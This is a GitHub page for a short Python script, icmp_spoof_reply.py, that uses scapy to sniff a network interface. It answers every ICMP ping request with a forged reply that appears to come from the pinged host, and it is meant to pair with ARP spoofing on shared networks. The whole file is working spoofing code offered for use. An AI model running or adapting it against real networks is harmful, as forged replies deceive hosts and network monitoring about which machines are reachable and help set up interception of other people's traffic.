-
Notifications
You must be signed in to change notification settings - Fork 2
/
icmp_spoof_reply.py
executable file
·74 lines (57 loc) · 2.06 KB
/
icmp_spoof_reply.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python3
# Description: ICMP spoof reply
# Depends on: scapy
#
# When in a shared network or ARP spoofing, this script will reply to
# ALL ICMP PING requests as though it came from the destination.
#
# Note: This does not cover the who has ARP requests to beat
# destination unknowns, you gotta fix that yourself.
#
# Hint: Use arp-broadcast-spoof, Luke.
#
# (c) 2020 Alexandr Savca, alexandr dot savca89 at gmail dot com
from scapy.all import *
def icmp_reply_spoof(interface):
def spoof(req):
if req.haslayer('ICMP') and req[ICMP].type == 8:
print(f"ICMP req from {req[IP].src} to {req[IP].dst}")
resp = Ether()/IP()/ICMP()/""
resp[Ether].dst = req[Ether].src
resp[Ether].src = req[Ether].dst
resp[IP].src = req[IP].dst
resp[IP].dst = req[IP].src
resp[ICMP].type = 0
resp[ICMP].id = req[ICMP].id
resp[ICMP].seq = req[ICMP].seq
resp[Raw].load = req[Raw].load
print(f"ICMP resp to {resp[IP].dst} as {resp[IP].src}")
sendp(resp, iface=interface)
sniff(prn=spoof, iface=interface)
def usage(program):
print(f"""
[ ICMP Spoof Reply ]---------------------------------------------------
When a shared network or ARP spoofing, this script will reply to ALL
ICMP PING requests as though it came from the destination.
Note: This does not cover the who has ARP requests to beat destination
unknowns. you gotta fix that yourself.
Hint: Use arp-spoof-flood, Luke!
-----------------------------------------------------------------------
Usage: {program} interface
""")
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
if sys.argv[1] == '-h' or sys.argv[1] == '--help':
usage(sys.argv[0])
sys.exit(1)
else:
interface = sys.argv[1]
else:
interface = get_working_if()
if os.getuid() != 0:
print("Must be superuser.")
sys.exit(1)
icmp_reply_spoof(interface)
# vim:sw=4:ts=4:sts=4:et:tw=71:cc=72
# End of file.